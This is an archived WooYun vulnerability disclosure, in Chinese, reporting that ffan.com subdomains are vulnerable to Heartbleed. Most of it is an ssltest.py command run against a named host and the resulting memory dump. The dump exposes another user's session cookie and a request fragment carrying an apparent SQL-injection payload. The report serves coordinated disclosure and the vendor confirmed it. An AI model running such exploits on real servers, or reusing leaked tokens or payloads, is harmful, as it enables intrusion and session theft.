乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-31: 细节已通知厂商并且等待厂商处理中 2015-03-31: 厂商已经确认,细节仅向厂商公开 2015-04-10: 细节向核心白帽子及相关领域专家公开 2015-04-20: 细节向普通白帽子公开 2015-04-30: 细节向实习白帽子公开 2015-05-15: 细节向公众公开
...
万达电商 ffan.com的所有子域名www.ffan.comHeartbleed 漏洞D:\Python27>python.exe ssltest.py -p "443" jf.ffan.com
Connecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 804 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384Received heartbeat response: 0000: 02 40 00 2F 77 64 70 6F 69 6E 74 2F 6A 61 76 61 .@./wdpoint/java 0010: 73 63 72 69 70 74 2F 35 66 39 39 65 63 37 32 34 script/5f99ec724 0020: 36 66 31 33 31 66 38 31 62 38 37 34 37 39 33 38 6f131f81b8747938 0030: 66 31 38 30 62 31 31 2F 77 64 70 6F 69 6E 74 2F f180b11/wdpoint/ 0040: 70 61 67 65 73 2F 68 65 61 64 65 72 2E 6A 73 20 pages/header.js 0050: 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74 HTTP/1.1..Accept 0060: 3A 20 2A 2F 2A 0D 0A 52 65 66 65 72 65 72 3A 20 : */*..Referer: 0070: 68 74 74 70 73 3A 2F 2F 6A 66 2E 66 66 61 6E 2E https://jf.ffan. 0080: 63 6F 6D 2F 64 65 74 61 69 6C 2F 69 6E 64 65 78 com/detail/index 0090: 2F 69 64 2F 32 37 30 0D 0A 41 63 63 65 70 74 2D /id/270..Accept- 00a0: 4C 61 6E 67 75 61 67 65 3A 20 7A 68 2D 63 6E 0D Language: zh-cn. 00b0: 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A .User-Agent: Moz 00c0: 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 illa/4.0 (compat 00d0: 69 62 6C 65 3B 20 4D 53 49 45 20 38 2E 30 3B 20 ible; MSIE 8.0; 00e0: 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 31 3B 20 Windows NT 5.1; 00f0: 54 72 69 64 65 6E 74 2F 34 2E 30 3B 20 2E 4E 45 Trident/4.0; .NE 0100: 54 34 2E 30 43 3B 20 2E 4E 45 54 34 2E 30 45 3B T4.0C; .NET4.0E; 0110: 20 2E 4E 45 54 20 43 4C 52 20 32 2E 30 2E 35 30 .NET CLR 2.0.50 0120: 37 32 37 29 0D 0A 41 63 63 65 70 74 2D 45 6E 63 727)..Accept-Enc 0130: 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 oding: gzip, def 0140: 6C 61 74 65 0D 0A 48 6F 73 74 3A 20 72 65 73 31 late..Host: res1 0150: 2E 66 66 61 6E 2E 63 6F 6D 0D 0A 43 6F 6E 6E 65 .ffan.com..Conne 0160: 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 ction: Keep-Aliv 0170: 65 0D 0A 43 6F 6F 6B 69 65 3A 20 53 45 53 53 49 e..Cookie: SESSI 0180: 4F 4E 49 44 3D 36 39 64 63 66 64 64 39 39 38 64 ONID=69dcfdd998d 0190: 34 34 38 63 65 38 63 63 31 65 62 64 31 65 66 36 448ce8cc1ebd1ef6 01a0: 64 30 30 61 35 3B 20 55 5F 55 49 44 3D 36 39 64 d00a5; U_UID=69d 01b0: 63 66 64 64 39 39 38 64 34 34 38 63 65 38 63 63 cfdd998d448ce8cc 01c0: 31 65 62 64 31 65 66 36 64 30 30 61 35 3B 20 43 1ebd1ef6d00a5; C 01d0: 49 54 59 5F 49 44 3D 31 31 30 31 30 30 0D 0A 0D ITY_ID=110100... 01e0: 0A 13 65 52 C8 1A B7 1F 31 DB C2 BB B3 68 4B 75 ..eR....1....hKu 01f0: 84 6F 5F 96 D7 02 02 02 2D 43 AF 29 D6 5B 0E 63 .o_.....-C.).[.c 0200: FD F2 50 AF A6 6D 66 64 39 DE 88 B5 DB 5B 6C C9 ..P..mfd9....[l. 0210: CB B3 B1 4F 80 4C 4C 25 32 43 4E 55 4C 4C 25 32 ...O.LL%2CNULL%2 0220: 43 4E 55 4C 4C 25 32 43 4E 55 4C 4C 25 32 43 4E CNULL%2CNULL%2CN 0230: 55 4C 4C 25 32 43 4E 55 4C 4C 25 32 43 4E 55 4C ULL%2CNULL%2CNUL 0240: 4C 25 32 43 4E 55 4C 4C 25 32 43 4E 55 4C 4C 25 L%2CNULL%2CNULL% 0250: 32 43 4E 55 4C 4C 2D 2D 25 32 30 26 73 74 6F 63 2CNULL--%20&stoc 0260: 6B 3D 33 30 30 26 67 6F 6F 64 73 5F 69 64 3D 31 k=300&goods_id=1 0270: E5 3B 93 B4 FD D0 58 48 5C 14 25 D3 A3 25 81 CA .;....XH\.%..%.. 0280: FF B8 A4 F5 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B ................ 0290: 2A A1 E2 11 B5 39 4F 4A 40 AB 61 DD 10 9D CB 80 *[email protected]..... 02a0: D8 CC DE 6D D1 78 74 08 0F 43 28 C1 F2 68 BD 06 ...m.xt..C(..h.. 02b0: 3A 7B CB E0 36 6F 64 73 5F 69 64 3D 31 55 FC 45 :{..6ods_id=1U.E 02c0: 90 D3 BA CC 03 97 BC CD 01 89 EE CC A6 B7 2A A8 ..............*. 02d0: 20 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E ............... 02e0: A7 27 01 29 D3 E3 38 C9 C7 0A 73 1C 4C 83 4E C7 .'.)..8...s.L.N. 02f0: 37 7D 36 53 B4 5D A8 95 6A A9 A1 B5 8F 04 49 3C 7}6S.]..j.....I< 0300: 1F 25 E6 8C DE D9 99 45 3F D1 70 21 23 DC 57 42 .%.....E?.p!#.WB 0310: 6B 82 5F C6 9F 99 C4 A3 1D F7 66 F9 13 F4 C3 C8 k._.......f..... 0320: 56 5E 13 6C 19 52 2A 0B 86 84 C6 7E 5F 44 67 1F V^.l.R*....~_Dg. 0330: 9A C1 53 48 58 73 5F 69 64 3D 31 63 16 93 28 CE ..SHXs_id=1c..(. 0340: D9 B9 10 F0 B1 42 10 E1 BD 46 6B A0 98 11 CB 00 .....B...Fk..... 0350: 21 F2 C2 1B D4 10 38 E8 E9 11 70 6B 9C ED B4 19 !.....8...pk.... 0360: 2D 2B 1A 25 4B CF 4F 77 3E EB 5D 69 D8 C3 C5 C9 -+.%K.Ow>.]i.... 0370: C4 99 1B B0 00 F2 36 B2 C8 66 CB EA 0C FB 5B 50 ......6..f....[P
ok 不一一演示 自测.
···
···升级
危害等级:高
漏洞Rank:12
确认时间:2015-03-31 15:20
感谢爱上平顶山同学的关注与贡献!马上通知业务整改!
暂无